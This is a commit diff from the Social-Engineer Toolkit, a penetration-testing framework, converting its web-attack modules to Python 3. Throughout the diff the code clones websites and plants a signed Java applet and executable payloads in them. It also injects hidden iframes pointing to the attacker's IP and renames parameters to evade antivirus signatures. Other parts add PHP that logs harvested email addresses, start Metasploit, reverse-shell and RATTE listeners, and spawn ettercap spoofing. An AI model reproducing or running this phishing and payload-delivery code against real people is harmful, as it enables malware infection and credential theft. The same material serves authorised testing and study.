autopep8 and python3 refactoring - wh00t

This commit is contained in:
TrustedSec 2016-01-14 17:06:10 -05:00
parent 633a59779b
commit cefd5ffa2d
43 changed files with 4471 additions and 3863 deletions


@ -1,7 +1,7 @@
#!/usr/bin/env python
import os
import sys
definepath=os.getcwd()
definepath = os.getcwd()
sys.path.append(definepath)
from src.core.setcore import *
start_web_server_unthreaded(setdir + "/web_clone/")


@ -5,8 +5,8 @@ import re
import socket
import subprocess
from src.core.setcore import *
import thread
import SocketServer
import _thread
import socketserver
import shutil
import re
import threading
@ -19,32 +19,37 @@ track_email = check_config("TRACK_EMAIL_ADDRESSES=").lower()
# grab the randomized applet name
applet_name = check_options("APPLET_NAME=")
if applet_name == "":
applet_name = generate_random_string(6, 15) + ".jar"
update_options("APPLET_NAME=" + applet_name)
applet_name = generate_random_string(6, 15) + ".jar"
update_options("APPLET_NAME=" + applet_name)
# define if we are using a custom payload
custom = 0
if check_options("CUSTOM_EXE="):
custom = 1
print_status("Note that since you are using a custom payload, you will need to create your OWN listener.")
print_status("SET has no idea what type of payload you are using, so you will need to set this up manually.")
print_status("If using a custom Metasploit payload, setup a multi/handler, etc. to capture the connection back.")
if check_options("CUSTOM_EXE="):
custom = 1
print_status(
"Note that since you are using a custom payload, you will need to create your OWN listener.")
print_status(
"SET has no idea what type of payload you are using, so you will need to set this up manually.")
print_status(
"If using a custom Metasploit payload, setup a multi/handler, etc. to capture the connection back.")
# here we need to modify the java applet to recognize custom attribute
fileopen3 = fileopen = file("%s/web_clone/index.html" % (setdir), "r")
filewrite = file("%s/web_clone/index.html.new" % (setdir), "w")
data = fileopen3.read()
# here we need to modify the java applet to recognize custom attribute
fileopen3 = fileopen = open("%s/web_clone/index.html" % (setdir), "r")
filewrite = open("%s/web_clone/index.html.new" % (setdir), "w")
data = fileopen3.read()
# we randomize param name so static sigs cant be used
goat_random = generate_random_string(4, 4)
data = data.replace('param name="8" value="YES"', 'param name="8" value="%s"' % (goat_random))
filewrite.write(data)
filewrite.close()
subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html" % (setdir,setdir), shell=True).wait()
# we randomize param name so static sigs cant be used
goat_random = generate_random_string(4, 4)
data = data.replace('param name="8" value="YES"',
'param name="8" value="%s"' % (goat_random))
filewrite.write(data)
filewrite.close()
subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html" %
(setdir, setdir), shell=True).wait()
# set current path
definepath=os.getcwd()
definepath = os.getcwd()
# check os
operating_system = check_os()
@ -56,7 +61,8 @@ if operating_system == "posix":
try:
import pexpect
except ImportError:
print_error("python-pexpect is not installed.. some things may not work.")
print_error(
"python-pexpect is not installed.. some things may not work.")
return_continue()
# specify base msf_path
@ -65,73 +71,79 @@ msf_path = ""
# see if we are using setshell
set_payload = ""
if os.path.isfile(setdir + "/set.payload"):
fileopen = file(setdir + "/set.payload", "r")
for line in fileopen: set_payload = line.rstrip()
fileopen = open(setdir + "/set.payload", "r")
for line in fileopen:
set_payload = line.rstrip()
##################################################################################
##########################################################################
#
# Start of the SET Web Server for multiattack, java applet, etc.
#
##################################################################################
##########################################################################
def web_server_start():
# define if use apache or not
apache=0
apache = 0
# open set_config here
apache_check = check_config("APACHE_SERVER=").lower()
if apache_check == "on" or track_email == "on":
apache_path = check_config("APACHE_DIRECTORY=")
if os.path.isdir(apache_path + "/html"): apache_path = apache_path + "/html"
if os.path.isdir(apache_path + "/html"):
apache_path = apache_path + "/html"
apache = 1
if operating_system == "windows": apache = 0
if operating_system == "windows":
apache = 0
# specify the web port
web_port = check_config("WEB_PORT=")
# see if exploit requires webdav
if os.path.isfile(setdir + "/meta_config"):
fileopen=file(setdir + "/meta_config", "r")
fileopen = open(setdir + "/meta_config", "r")
for line in fileopen:
line=line.rstrip()
match=re.search("set SRVPORT 80", line)
line = line.rstrip()
match = re.search("set SRVPORT 80", line)
if match:
match2=re.search("set SRVPORT 8080", line)
match2 = re.search("set SRVPORT 8080", line)
if not match2:
web_port=8080
web_port = 8080
# check ip address
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
else:
ipaddr = raw_input("Enter your ipaddress: ")
ipaddr = input("Enter your ipaddress: ")
# Grab custom or set defined
if os.path.isfile(setdir + "/site.template"):
fileopen=file(setdir + "/site.template","r").readlines()
fileopen = open(setdir + "/site.template", "r").readlines()
for line in fileopen:
line=line.rstrip()
match=re.search("TEMPLATE=", line)
line = line.rstrip()
match = re.search("TEMPLATE=", line)
if match:
line=line.split("=")
template=line[1]
line = line.split("=")
template = line[1]
# grab web attack selection
if os.path.isfile(setdir + "/attack_vector"):
fileopen=file(setdir + "/attack_vector","r").readlines()
fileopen = open(setdir + "/attack_vector", "r").readlines()
for line in fileopen:
attack_vector=line.rstrip()
attack_vector = line.rstrip()
# if it doesn't exist just set a default template
if not os.path.isfile(setdir + "/attack_vector"):
attack_vector = "nada"
# Sticking it to A/V below
import string,random
def random_string(minlength=6,maxlength=15):
length=random.randint(minlength,maxlength)
letters=string.ascii_letters+string.digits
import string
import random
def random_string(minlength=6, maxlength=15):
length = random.randint(minlength, maxlength)
letters = string.ascii_letters + string.digits
return ''.join([random.choice(letters) for _ in range(length)])
rand_gen=random_string()
rand_gen = random_string()
# check multiattack flags here
multiattack_harv = "off"
@ -142,22 +154,23 @@ def web_server_start():
# open our config file that was specified in SET
if os.path.isfile(setdir + "/site.template"):
fileopen=file(setdir + "/site.template", "r").readlines()
fileopen = open(setdir + "/site.template", "r").readlines()
# start loop here
for line in fileopen:
line=line.rstrip()
line = line.rstrip()
# look for config file and parse for URL
match=re.search("URL=",line)
match = re.search("URL=", line)
if match:
line=line.split("=")
line = line.split("=")
# define url to clone here
url=line[1].rstrip()
url = line[1].rstrip()
# if we didn't create template then do self
if not os.path.isfile(setdir + "/site.template"):
template = "SELF"
# If SET is setting up the website for you, get the website ready for delivery
# If SET is setting up the website for you, get the website ready for
# delivery
if template == "SET":
# change to that directory
@ -166,15 +179,16 @@ def web_server_start():
if os.path.isfile("index.html"):
os.remove("index.html")
# define files and get ipaddress set in index.html
fileopen=file("index.template", "r").readlines()
filewrite=file("index.html", "w")
fileopen = open("index.template", "r").readlines()
filewrite = open("index.html", "w")
if attack_vector == "java":
for line in fileopen:
match1=re.search("msf.exe", line)
if match1: line=line.replace("msf.exe", rand_gen)
match=re.search("ipaddrhere", line)
match1 = re.search("msf.exe", line)
if match1:
line = line.replace("msf.exe", rand_gen)
match = re.search("ipaddrhere", line)
if match:
line=line.replace("ipaddrhere", ipaddr)
line = line.replace("ipaddrhere", ipaddr)
filewrite.write(line)
# move random generated name
filewrite.close()
@ -182,24 +196,26 @@ def web_server_start():
# define browser attack vector here
if attack_vector == "browser":
counter=0
counter = 0
for line in fileopen:
counter=0
match=re.search(applet_name, line)
counter = 0
match = re.search(applet_name, line)
if match:
line=line.replace(applet_name, "invalid.jar")
line = line.replace(applet_name, "invalid.jar")
filewrite.write(line)
counter=1
match2=re.search("<head>", line)
counter = 1
match2 = re.search("<head>", line)
if match2:
if web_port != 8080:
line=line.replace("<head>", '<head><iframe src ="http://%s:8080/" width="100" height="100" scrolling="no"></iframe>' % (ipaddr))
line = line.replace(
"<head>", '<head><iframe src ="http://%s:8080/" width="100" height="100" scrolling="no"></iframe>' % (ipaddr))
filewrite.write(line)
counter=1
counter = 1
if web_port == 8080:
line=line.replace("<head>", '<head><iframe src = "http://%s:80/" width="100" height="100" scrolling="no" ></iframe>' % (ipaddr))
line = line.replace(
"<head>", '<head><iframe src = "http://%s:80/" width="100" height="100" scrolling="no" ></iframe>' % (ipaddr))
filewrite.write(line)
counter=1
counter = 1
if counter == 0:
filewrite.write(line)
filewrite.close()
@ -208,33 +224,41 @@ def web_server_start():
# Bring our files to our directory
if attack_vector != 'hid':
if attack_vector != 'hijacking':
print bcolors.YELLOW + "[*] Moving payload into cloned website." + bcolors.ENDC
print(bcolors.YELLOW + "[*] Moving payload into cloned website." + bcolors.ENDC)
# copy all the files needed
if not os.path.isfile(setdir + "/" + applet_name):
shutil.copyfile("%s/src/html/Signed_Update.jar.orig" % (definepath), "%s/%s" % (setdir,applet_name))
shutil.copyfile(setdir + "/%s" % (applet_name), "%s/web_clone/%s" % (setdir,applet_name))
shutil.copyfile("%s/src/html/Signed_Update.jar.orig" %
(definepath), "%s/%s" % (setdir, applet_name))
shutil.copyfile(setdir + "/%s" % (applet_name),
"%s/web_clone/%s" % (setdir, applet_name))
if os.path.isfile("%s/src/html/nix.bin" % (definepath)):
nix = check_options("NIX.BIN=")
shutil.copyfile("%s/src/html/nix.bin" % (definepath), "%s/web_clone/%s" % (setdir, nix))
shutil.copyfile("%s/src/html/nix.bin" %
(definepath), "%s/web_clone/%s" % (setdir, nix))
if os.path.isfile("%s/src/html/mac.bin" % (definepath)):
mac = check_options("MAC.BIN=")
shutil.copyfile("%s/src/html/mac.bin" % (definepath), "%s/web_clone/%s" % (setdir, definepath, mac))
shutil.copyfile("%s/src/html/mac.bin" % (definepath),
"%s/web_clone/%s" % (setdir, definepath, mac))
if os.path.isfile(setdir + "/msf.exe"):
win = check_options("MSF.EXE=")
shutil.copyfile(setdir + "/msf.exe" , "%s/web_clone/%s" % (setdir,win))
shutil.copyfile(setdir + "/msf.exe",
"%s/web_clone/%s" % (setdir, win))
# pull random name generation
print_status("The site has been moved. SET Web Server is now listening..")
print_status(
"The site has been moved. SET Web Server is now listening..")
rand_gen = check_options("MSF_EXE=")
if rand_gen != 0:
if os.path.isfile(setdir + "/custom.exe"):
shutil.copyfile(setdir + "/msf.exe", setdir + "/web_clone/msf.exe")
print "\n[*] Website has been cloned and custom payload imported. Have someone browse your site now"
shutil.copyfile(setdir + "/web_clone/msf.exe", setdir + "/web_clone/%s" % (rand_gen))
shutil.copyfile(setdir + "/msf.exe",
setdir + "/web_clone/msf.exe")
print("\n[*] Website has been cloned and custom payload imported. Have someone browse your site now")
shutil.copyfile(setdir + "/web_clone/msf.exe",
setdir + "/web_clone/%s" % (rand_gen))
# if docbase exploit do some funky stuff to get it to work right
if os.path.isfile(setdir + "/docbase.file"):
docbase=(r"""<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
docbase = (r"""<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<HTML>
<HEAD>
@ -245,197 +269,228 @@ def web_server_start():
<FRAME name=docbase noresize borders=0 scrolling=no src="http://%s:8080">
</FRAMESET>
</HTML>""" % (ipaddr))
if os.path.isfile(setdir + "/web_clone/site.html"): os.remove(setdir + "/web_clone/site.html")
shutil.copyfile(setdir + "/web_clone/index.html", setdir + "/web_clone/site.html")
filewrite=file(setdir + "/web_clone/index.html", "w")
if os.path.isfile(setdir + "/web_clone/site.html"):
os.remove(setdir + "/web_clone/site.html")
shutil.copyfile(setdir + "/web_clone/index.html",
setdir + "/web_clone/site.html")
filewrite = open(setdir + "/web_clone/index.html", "w")
filewrite.write(docbase)
filewrite.close()
####################################################################################################################################
##########################################################################
#
# START WEB SERVER STUFF HERE
#
####################################################################################################################################
##########################################################################
if apache == 0:
if multiattack_harv == 'off':
try:
# specify port listener here
import src.core.webserver as webserver
# specify the path for the SET web directories for the applet attack
# specify port listener here
import src.core.webserver as webserver
# specify the path for the SET web directories for the applet
# attack
path = (setdir + "/web_clone/")
try:
import multiprocessing
p = multiprocessing.Process(target=webserver.start_server, args=(web_port,path))
p = multiprocessing.Process(
target=webserver.start_server, args=(web_port, path))
p.start()
except Exception:
import thread
thread.start_new_thread(webserver.start_server, (web_port,path))
import _thread
_thread.start_new_thread(
webserver.start_server, (web_port, path))
# Handle KeyboardInterrupt
except KeyboardInterrupt:
exit_set()
# Handle Exceptions
except Exception,e:
print e
except Exception as e:
print(e)
log(e)
print bcolors.RED + "[!] ERROR: You probably have something running on port 80 already, Apache??"
print "[!] There was an issue, printing error: " +str(e) + bcolors.ENDC
print bcolors.ENDC + "Do you want to try to stop Apache? y/n"
stop_apache = raw_input("Attempt to stop Apache? y/n: ")
print(bcolors.RED + "[!] ERROR: You probably have something running on port 80 already, Apache??")
print("[!] There was an issue, printing error: " + str(e) + bcolors.ENDC)
print(bcolors.ENDC + "Do you want to try to stop Apache? y/n")
stop_apache = input("Attempt to stop Apache? y/n: ")
if stop_apache == "yes" or stop_apache == "y" or stop_apache == "":
subprocess.Popen("/etc/init.d/apache2 stop", shell=True).wait()
subprocess.Popen(
"/etc/init.d/apache2 stop", shell=True).wait()
try:
# specify port listener here
import src.core.webserver as webserver
# specify the path for the SET web directories for the applet attack
# specify the path for the SET web directories for the
# applet attack
path = (setdir + "/web_clone/")
p = multiprocessing.Process(target=webserver.start_server, args=(web_port,path))
p = multiprocessing.Process(
target=webserver.start_server, args=(web_port, path))
p.start()
except Exception:
print bcolors.RED + "[!] UNABLE TO STOP APACHE! Exiting..." + bcolors.ENDC
print(bcolors.RED + "[!] UNABLE TO STOP APACHE! Exiting..." + bcolors.ENDC)
sys.exit()
# if we are custom, put a pause here to not terminate thread on web server
# if we are custom, put a pause here to not terminate thread on web
# server
if template == "CUSTOM" or template == "SELF":
custom_exe = check_options("CUSTOM_EXE=")
if custom_exe != 0:
while 1:
# try block inside of loop, if control-c detected, then exit
# try block inside of loop, if control-c detected, then
# exit
try:
print_warning("Note that if you are using a CUSTOM payload. YOU NEED TO CREATE A LISTENER!!!!!")
pause = raw_input(bcolors.GREEN + "\n[*] Web Server is listening. Press Control-C to exit." + bcolors.ENDC)
print_warning(
"Note that if you are using a CUSTOM payload. YOU NEED TO CREATE A LISTENER!!!!!")
pause = input(
bcolors.GREEN + "\n[*] Web Server is listening. Press Control-C to exit." + bcolors.ENDC)
# handle keyboard interrupt
except KeyboardInterrupt:
print bcolors.GREEN + "[*] Returning to main menu." + bcolors.ENDC
print(bcolors.GREEN + "[*] Returning to main menu." + bcolors.ENDC)
break
if apache == 1:
subprocess.Popen("cp %s/src/html/*.bin %s 1> /dev/null 2> /dev/null;cp %s/src/html/*.html %s 1> /dev/null 2> /dev/null;cp %s/web_clone/* %s 1> /dev/null 2> /dev/null;cp %s/msf.exe %s 1> /dev/null 2> /dev/null;cp %s/*.jar %s 1> /dev/null 2> /dev/null" % (definepath,apache_path,definepath,apache_path,setdir,apache_path,setdir,apache_path,setdir,apache_path), shell=True).wait()
subprocess.Popen("cp %s/src/html/*.bin %s 1> /dev/null 2> /dev/null;cp %s/src/html/*.html %s 1> /dev/null 2> /dev/null;cp %s/web_clone/* %s 1> /dev/null 2> /dev/null;cp %s/msf.exe %s 1> /dev/null 2> /dev/null;cp %s/*.jar %s 1> /dev/null 2> /dev/null" %
(definepath, apache_path, definepath, apache_path, setdir, apache_path, setdir, apache_path, setdir, apache_path), shell=True).wait()
# if we are tracking users
if track_email == "on":
now=datetime.datetime.today()
filewrite = file("%s/harvester_%s.txt" % (apache_path,now), "w")
now = datetime.datetime.today()
filewrite = open("%s/harvester_%s.txt" % (apache_path, now), "w")
filewrite.write("")
filewrite.close()
subprocess.Popen("chown www-data:www-data '%s/harvester_%s.txt'" % (apache_path,now), shell=True).wait()
subprocess.Popen("chown www-data:www-data '%s/harvester_%s.txt'" %
(apache_path, now), shell=True).wait()
# here we specify if we are tracking users and such
fileopen = file ("%s/index.html" % (apache_path), "r")
fileopen = open("%s/index.html" % (apache_path), "r")
data = fileopen.read()
data = data.replace("<body>", """<body><?php $file = 'harvester_%s.txt'; $queryString = ''; foreach ($_GET as $key => $value) { $queryString .= $key . '=' . $value . '&';}$query_string = base64_decode($queryString);file_put_contents($file, print_r("Email address recorded: " . $query_string . "\\n", true), FILE_APPEND);?>""" % (now))
filewrite = file("%s/index.php" % (apache_path), "w")
data = data.replace(
"<body>", """<body><?php $file = 'harvester_%s.txt'; $queryString = ''; foreach ($_GET as $key => $value) { $queryString .= $key . '=' . $value . '&';}$query_string = base64_decode($queryString);file_put_contents($file, print_r("Email address recorded: " . $query_string . "\\n", true), FILE_APPEND);?>""" % (now))
filewrite = open("%s/index.php" % (apache_path), "w")
filewrite.write(data)
filewrite.close()
print_status("All files have been copied to %s" % (apache_path))
#####################################################################################################################################
##########################################################################
#
# END WEB SERVER STUFF HERE
#
#####################################################################################################################################
##########################################################################
if operating_system != "windows":
# Grab metaspoit path
msf_path=meta_path()
msf_path = meta_path()
import pexpect
# define if use apache or not
apache=0
apache = 0
# open set_config here
apache_check = check_config("APACHE_SERVER=").lower()
if apache_check == "on" or track_email == "on":
apache_path = check_config("APACHE_DIRECTORY=")
apache = 1
if operating_system == "windows": apache = 0
if operating_system == "windows":
apache = 0
web_server = check_config("WEB_PORT=")
# setup multi attack options here
multiattack="off"
multiattack = "off"
if os.path.isfile(setdir + "/multi_tabnabbing"):
multiattack="on"
multiattack = "on"
if os.path.isfile(setdir + "/multi_harvester"):
multiattack="on"
multiattack = "on"
# Grab custom or set defined
template = ""
if os.path.isfile(setdir + "/site.template"):
fileopen=file(setdir + "/site.template","r").readlines()
fileopen = open(setdir + "/site.template", "r").readlines()
for line in fileopen:
line=line.rstrip()
match=re.search("TEMPLATE=", line)
line = line.rstrip()
match = re.search("TEMPLATE=", line)
if match:
line=line.split("=")
template=line[1]
line = line.split("=")
template = line[1]
# Test to see if something is running on port 80, if so throw error
try:
web_port = check_config("WEB_PORT=")
web_port=int(web_port)
ipaddr=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
web_port = int(web_port)
ipaddr = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ipaddr.connect(('127.0.0.1', web_port))
ipaddr.settimeout(2)
if ipaddr:
# if apache isnt running and something is on 80, throw error
if apache== 0:
print_error("ERROR:Something is running on port %s. Attempting to see if we can stop Apache..." % (web_port))
# if we are running windows then flag error (probably IIS or tomcat or something like that)
# if apache isnt running and something is on 80, throw error
if apache == 0:
print_error(
"ERROR:Something is running on port %s. Attempting to see if we can stop Apache..." % (web_port))
# if we are running windows then flag error (probably IIS or tomcat
# or something like that)
if operating_system == "nt":
exit_set()
# if we are running posix then check to see what the process is first
# if we are running posix then check to see what the process is
# first
if operating_system == "posix":
# if we detect an apache installation
if os.path.isfile("/etc/init.d/apache2"):
apache_stop = raw_input("[!] Apache may be running, do you want SET to stop the process? [y/n]: ")
if apache_stop.lower() == "y" or apache_stop.lower() == "yes":
print_status("Attempting to stop apache.. One moment..")
# stop apache here
subprocess.Popen("/etc/init.d/apache2 stop", shell=True).wait()
try:
ipaddr.connect(('localhost', web_port))
if ipaddr:
print_warning("If you want to use Apache, edit the /etc/setoolkit/set.config")
print_error("Exit whatever is listening and restart SET")
exit_set()
if os.path.isfile("/etc/init.d/apache2"):
apache_stop = input(
"[!] Apache may be running, do you want SET to stop the process? [y/n]: ")
if apache_stop.lower() == "y" or apache_stop.lower() == "yes":
print_status(
"Attempting to stop apache.. One moment..")
# stop apache here
subprocess.Popen(
"/etc/init.d/apache2 stop", shell=True).wait()
try:
ipaddr.connect(('localhost', web_port))
if ipaddr:
print_warning(
"If you want to use Apache, edit the /etc/setoolkit/set.config")
print_error(
"Exit whatever is listening and restart SET")
exit_set()
# if it couldn't connect to localhost, we are good to go and continue forward
except Exception:
print_status("Success! Apache was stopped. Moving forward within SET...")
# if we don't want to stop apache then exit SET and flag user
if apache_stop.lower() == "n" or apache_stop.lower() == "no":
print_warning("If you want to use Apache, edit the /etc/setoolkit/set.config and turn apache on")
print_error("Exit whatever is lsitening or turn Apache on in set_config and restart SET")
exit_set()
else:
print_warning("If you want to use Apache, edit the /etc/setoolkit/set.config")
print_error("Exit whatever is listening and restart SET")
# if it couldn't connect to localhost, we are good to
# go and continue forward
except Exception:
print_status(
"Success! Apache was stopped. Moving forward within SET...")
# if we don't want to stop apache then exit SET and flag
# user
if apache_stop.lower() == "n" or apache_stop.lower() == "no":
print_warning(
"If you want to use Apache, edit the /etc/setoolkit/set.config and turn apache on")
print_error(
"Exit whatever is lsitening or turn Apache on in set_config and restart SET")
exit_set()
else:
print_warning(
"If you want to use Apache, edit the /etc/setoolkit/set.config")
print_error("Exit whatever is listening and restart SET")
exit_set()
# if apache is set to run let the user know we are good to go
if operating_system == "posix":
if apache == 1:
try:
web_port = check_config("WEB_PORT=")
web_port=int(web_port)
ipaddr=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
web_port = int(web_port)
ipaddr = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ipaddr.connect(('127.0.0.1', web_port))
ipaddr.settimeout(2)
if ipaddr:
print_status("Apache appears to be running, moving files into Apache's home")
print_status(
"Apache appears to be running, moving files into Apache's home")
except:
print_error("Exit whatever is listening and restart SET")
exit_set()
# except all issues and throw out to here
except Exception, e:
except Exception as e:
# if we are using apache
if apache == 1:
@ -454,7 +509,8 @@ except Exception, e:
if apache_counter == 0:
print_error("ERROR: Unable to start Apache through SET,")
print_error("ERROR: Please turn Apache off in the set_config or turn it on manually!")
print_error(
"ERROR: Please turn Apache off in the set_config or turn it on manually!")
print_error("Exiting the Social-Engineer Toolkit...")
exit_set()
@ -464,42 +520,47 @@ except KeyboardInterrupt:
# grab metasploit root directory
if operating_system == "posix":
msf_path=meta_path()
msf_path = meta_path()
# Launch SET web attack and MSF Listener
try:
if multiattack == "off":
print (bcolors.BLUE + "\n***************************************************")
print (bcolors.YELLOW + "Web Server Launched. Welcome to the SET Web Attack.")
print (bcolors.BLUE + "***************************************************")
print (bcolors.PURPLE+ "\n[--] Tested on Windows, Linux, and OSX [--]" + bcolors.ENDC)
print((bcolors.BLUE + "\n***************************************************"))
print((bcolors.YELLOW + "Web Server Launched. Welcome to the SET Web Attack."))
print((bcolors.BLUE + "***************************************************"))
print((bcolors.PURPLE +
"\n[--] Tested on Windows, Linux, and OSX [--]" + bcolors.ENDC))
if apache == 1:
print (bcolors.GREEN+ "[--] Apache web server is currently in use for performance. [--]" + bcolors.ENDC)
print((
bcolors.GREEN + "[--] Apache web server is currently in use for performance. [--]" + bcolors.ENDC))
if os.path.isfile(setdir + "/meta_config"):
fileopen=file(setdir + "/meta_config", "r")
fileopen = open(setdir + "/meta_config", "r")
for line in fileopen:
line=line.rstrip()
match=re.search("set SRVPORT 80", line)
line = line.rstrip()
match = re.search("set SRVPORT 80", line)
if match:
match2=re.search("set SRVPORT 8080", line)
match2 = re.search("set SRVPORT 8080", line)
if not match2:
if apache == 1:
print_warning("Apache appears to be configured in the SET (set_config)")
print_warning("You will need to disable Apache and re-run SET since Metasploit requires port 80 for WebDav")
print_warning(
"Apache appears to be configured in the SET (set_config)")
print_warning(
"You will need to disable Apache and re-run SET since Metasploit requires port 80 for WebDav")
exit_set()
print bcolors.RED + """Since the exploit picked requires port 80 for WebDav, the\nSET HTTP Server port has been changed to 8080. You will need\nto coax someone to your IP Address on 8080, for example\nyou need it to be http://172.16.32.50:8080 instead of standard\nhttp (80) traffic."""
print(bcolors.RED + """Since the exploit picked requires port 80 for WebDav, the\nSET HTTP Server port has been changed to 8080. You will need\nto coax someone to your IP Address on 8080, for example\nyou need it to be http://172.16.32.50:8080 instead of standard\nhttp (80) traffic.""")
web_server_start()
# if we are using ettercap
if os.path.isfile(setdir + "/ettercap"):
fileopen5=file(setdir + "/ettercap", "r")
fileopen5 = open(setdir + "/ettercap", "r")
for line in fileopen5:
ettercap=line.rstrip()
ettercap = line.rstrip()
# run in background
ettercap=ettercap+" &"
ettercap = ettercap + " &"
# spawn ettercap or dsniff
subprocess.Popen(ettercap, shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE)
subprocess.Popen(ettercap, shell=True,
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
# if metasploit config is in directory
if os.path.isfile(setdir + "/meta_config"):
@ -508,75 +569,93 @@ try:
# this checks to see if we want to start a listener
automatic_listener = check_config("AUTOMATIC_LISTENER=").lower()
if automatic_listener != "off":
try: reload(pexpect)
except: import pexpect
try:
reload(pexpect)
except:
import pexpect
# specify if we are using the multi pyinjector
meta_config = "meta_config"
if os.path.isfile(setdir + "/meta_config_multipyinjector"):
meta_config = "meta_config_multipyinjector"
# if we arent using a custom payload
if custom != 1:
child1=pexpect.spawn("%smsfconsole -r %s/%s\r\n\r\n" % (msf_path,setdir,meta_config))
# check if we want to deliver emails or track users that click the link
# if we arent using a custom payload
if custom != 1:
child1 = pexpect.spawn(
"%smsfconsole -r %s/%s\r\n\r\n" % (msf_path, setdir, meta_config))
# check if we want to deliver emails or track users that click the
# link
webattack_email = check_config("WEBATTACK_EMAIL=").lower()
if webattack_email == "on" or track_email == "on":
try: reload(src.phishing.smtp.client.smtp_web)
except: import src.phishing.smtp.client.smtp_web
try:
reload(src.phishing.smtp.client.smtp_web)
except:
import src.phishing.smtp.client.smtp_web
# if we arent using a custom payload
# if we arent using a custom payload
if custom != 1:
child1.interact()
child1.interact()
if os.path.isfile(setdir + "/set.payload"):
port = check_options("PORT=")
# grab configuration
fileopen=file(setdir + "/set.payload", "r")
for line in fileopen: set_payload = line.rstrip()
fileopen = open(setdir + "/set.payload", "r")
for line in fileopen:
set_payload = line.rstrip()
if set_payload == "SETSHELL":
print "\n"
print("\n")
print_info("Launching the SET Interactive Shell...")
try: reload(src.payloads.set_payloads.listener)
except: import src.payloads.set_payloads.listener
try:
reload(src.payloads.set_payloads.listener)
except:
import src.payloads.set_payloads.listener
if set_payload == "SETSHELL_HTTP":
print "\n"
print("\n")
print_info("Launching the SET HTTP Reverse Shell Listener...")
try: reload(src.payloads.set_payloads.set_http_server)
except: import src.payloads.set_payloads.set_http_server
try:
reload(src.payloads.set_payloads.set_http_server)
except:
import src.payloads.set_payloads.set_http_server
if set_payload == "RATTE":
print_info("Launching the Remote Administration Tool Tommy Edition (RATTE) Payload...")
print_info(
"Launching the Remote Administration Tool Tommy Edition (RATTE) Payload...")
# prep ratte if its posix
if operating_system == "posix":
subprocess.Popen("chmod +x src/payloads/ratte/ratteserver", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
subprocess.Popen("chmod +x src/payloads/ratte/ratteserver",
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
os.system("src/payloads/ratte/ratteserver %s" % (port))
# if not then run it in windows
if operating_system == "windows":
if not os.path.isfile(setdir + "/ratteserver.exe"):
shutil.copyfile("../../payloads/ratte/ratteserver.binary", setdir + "/ratteserver.exe")
shutil.copyfile("../../payloads/ratte/cygwin1.dll", setdir + "/cygwin1.dll")
os.system(setdir + "/ratteserver %s" % (definepath,port))
shutil.copyfile(
"../../payloads/ratte/ratteserver.binary", setdir + "/ratteserver.exe")
shutil.copyfile(
"../../payloads/ratte/cygwin1.dll", setdir + "/cygwin1.dll")
os.system(setdir + "/ratteserver %s" % (definepath, port))
# handle errors
except Exception, e:
except Exception as e:
log(e)
pass
try:
if apache == 1:
raw_input(bcolors.ENDC +"\nPress [return] when finished.")
input(bcolors.ENDC + "\nPress [return] when finished.")
child.close()
child1.close()
# close ettercap thread, need to launch from here eventually instead of executing
# an underlying system command.
if operating_system == "posix":
subprocess.Popen("pkill ettercap 1> /dev/null 2> /dev/null", shell=True).wait()
subprocess.Popen(
"pkill ettercap 1> /dev/null 2> /dev/null", shell=True).wait()
# kill dnsspoof if there
subprocess.Popen("pkill dnsspoof 1> /dev/null 2> /dev/null", shell=True).wait()
subprocess.Popen(
"pkill dnsspoof 1> /dev/null 2> /dev/null", shell=True).wait()
if apache == 1:
subprocess.Popen("rm %s/index.html 1> /dev/null 2> /dev/null;rm %s/Signed* 1> /dev/null 2> /dev/null;rm %s/*.exe 1> /dev/null 2> /dev/null" % (apache_path,apache_path,apache_path), shell=True).wait()
subprocess.Popen("rm %s/index.html 1> /dev/null 2> /dev/null;rm %s/Signed* 1> /dev/null 2> /dev/null;rm %s/*.exe 1> /dev/null 2> /dev/null" %
(apache_path, apache_path, apache_path), shell=True).wait()
except:
try:
child.close()
@ -588,7 +667,7 @@ except KeyboardInterrupt:
# if we turned automatic listener off
if automatic_listener == "off" or multiattack== "on":
if automatic_listener == "off" or multiattack == "on":
if automatic_listener == "off":
print_warning("Listener is turned off in /etc/setoolkit/set.config!")
@ -596,14 +675,17 @@ if automatic_listener == "off" or multiattack== "on":
while 1:
try:
print_warning("\n If you used custom imports, ensure you create YOUR OWN LISTENER!\nSET does not know what custom payload you used.")
pause = raw_input("\nPress {control -c} to return to the main menu when you are finished.")
print_warning(
"\n If you used custom imports, ensure you create YOUR OWN LISTENER!\nSET does not know what custom payload you used.")
pause = input(
"\nPress {control -c} to return to the main menu when you are finished.")
except KeyboardInterrupt:
break
if apache == 1:
# if we are running apache then prompt to exit this menu
print_status("Everything has been moved over to Apache and is ready to go.")
print_status(
"Everything has been moved over to Apache and is ready to go.")
return_continue()
# we stop the python web server when we are all finished
@ -611,8 +693,10 @@ if apache == 0:
# specify the web port
web_port = check_config("WEB_PORT=")
# stop the web server
try: import src.core.webserver as webserver
except: reload(src.core.webserver)
try:
import src.core.webserver as webserver
except:
reload(src.core.webserver)
webserver.stop_server(web_port)
# call the cleanup routine


@ -10,11 +10,12 @@ from src.core.setcore import *
#########################
# create Key: keytool -genkey -alias signapplet -keystore mykeystore -keypass mykeypass -storepass mystorepass
# sign: jarsigner -keystore mykeystore -storepass mystorepass -keypass mykeypass -signedjar SignedMicrosoft.jar oMicrosoft.jar signapplet
# sign: jarsigner -keystore mykeystore -storepass mystorepass -keypass
# mykeypass -signedjar SignedMicrosoft.jar oMicrosoft.jar signapplet
os.chdir("src/html/unsigned")
print """
print("""
Simply enter in the required fields, easy example below:
Name: FakeCompany
@ -24,7 +25,7 @@ print """
State: Ohio
Country: US
Is this correct: yes
"""
""")
print_error("*** WARNING ***")
